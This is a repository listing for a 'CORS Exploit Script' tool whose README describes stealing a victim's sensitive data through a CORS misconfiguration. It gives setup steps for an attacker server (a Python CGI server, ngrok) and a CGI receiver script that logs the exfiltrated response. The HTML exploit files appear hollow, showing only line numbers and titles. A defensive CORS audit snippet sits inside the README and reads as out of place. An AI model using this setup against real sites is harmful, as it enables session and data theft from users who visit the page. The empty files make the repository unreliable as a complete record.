├── bin
│   └── datafetch.py
├── cors.html
├── OLD_script.html
├── README.md
├── CORS_POC.html
├── new.pdf
└── pdf content
/bin/datafetch.py:
--------------------------------------------------------------------------------
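#!/usr/bin/env python3
# CGI receiver: logs the 'responsehtml' field of a POSTed form to stderr.
# Note: the cgi module is deprecated since Python 3.11 and removed in 3.13.
import cgi
import sys
import urllib.parse

# Parse the submitted form fields from the CGI environment.
postform = cgi.FieldStorage()
# URL-decode the field and turn literal "\r\n" and "\t" escape sequences into real characters.
postdata = urllib.parse.unquote(postform['responsehtml'].value).replace('\\r\\n', '\r\n').replace('\\t', '\t')
sys.stderr.write(postdata)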
--------------------------------------------------------------------------------
/cors.html:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
7 |
21 |
22 |
23 |
24 | Exploiting CORS Vulnerability
25 | Extract SID
26 | Exploit
27 |
28 |
29 |
30 |
--------------------------------------------------------------------------------
/OLD_script.html:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
7 |
21 |
22 |
23 |
24 | Exploiting CORS Vulnerability
25 | Extract SID
26 | Exploit
27 |
28 |
29 |
--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
# CORS Exploit Script
> If the victim application is vulnerable to CORS exploit, using this exploit script we were able to send sensitive information to the attacker server.

## Usage
* `git clone https://github.com/topavankumarj/CORS-Exploit-Script`

* Edit `CORS_POC.html` and change the `victim_URL` and `attacker_URL` values.

* Start the Python server using the command below:

```
python3 -m http.server --cgi 5555
```

* Run ngrok (optional):
```
./ngrok http 5555
```

* Now open `CORS_POC.html` in the victim browser.

If the application is vulnerable and everything goes well, the exploit script will send the sensitive information to the attacker server.

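The server-side condition a cross-origin page like this depends on is a response that echoes the caller's `Origin` while allowing credentials. The following is an added example, not code from this repository: it puts that weak policy beside an exact-match allowlist and audits both. The origins, the allowlist and all function names are constructed for illustration.

```python
from urllib.parse import urlsplit

TRUSTED_ORIGINS = {"https://app.example.com"}  # constructed allowlist


def reflective_policy(origin):
    """Weak: echoes any Origin back and allows credentials."""
    return {"Access-Control-Allow-Origin": origin,
            "Access-Control-Allow-Credentials": "true"}


def allowlist_policy(origin, trusted=TRUSTED_ORIGINS):
    """Hardened: exact-match allowlist; no CORS grant for anything else."""
    parts = urlsplit(origin or "")
    normalized = f"{parts.scheme}://{parts.netloc}".lower()
    # Exact comparison on scheme + host[:port]; no prefix, suffix or regex matching.
    if parts.scheme != "https" or normalized not in trusted:
        return {"Vary": "Origin"}
    return {"Access-Control-Allow-Origin": normalized,
            "Access-Control-Allow-Credentials": "true",
            "Vary": "Origin"}


def audit(policy, probe_origins=("https://untrusted.example", "null")):
    """Return findings for origins that must never get credentialed read access."""
    findings = []
    for origin in probe_origins:
        headers = policy(origin)
        acao = headers.get("Access-Control-Allow-Origin")
        creds = headers.get("Access-Control-Allow-Credentials", "").lower() == "true"
        if acao == origin and creds:
            findings.append(f"credentialed read allowed for {origin}")
        elif acao == "*":
            findings.append(f"wildcard origin returned for {origin}")
    return findings


if __name__ == "__main__":
    print("reflective:", audit(reflective_policy))
    print("allowlist: ", audit(allowlist_policy))
```

Pointing `audit` at a function that wraps your own application's CORS handler gives a regression test for this misconfiguration.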
--------------------------------------------------------------------------------
/CORS_POC.html:
--------------------------------------------------------------------------------
1 |
2 |
3 | CORS Exploit POC
4 |
5 |
6 | CORS Exploit POC
7 |
24 |
25 |
26 |
--------------------------------------------------------------------------------
/new.pdf:
--------------------------------------------------------------------------------
--------------------------------------------------------------------------------
/pdf content:
--------------------------------------------------------------------------------
--------------------------------------------------------------------------------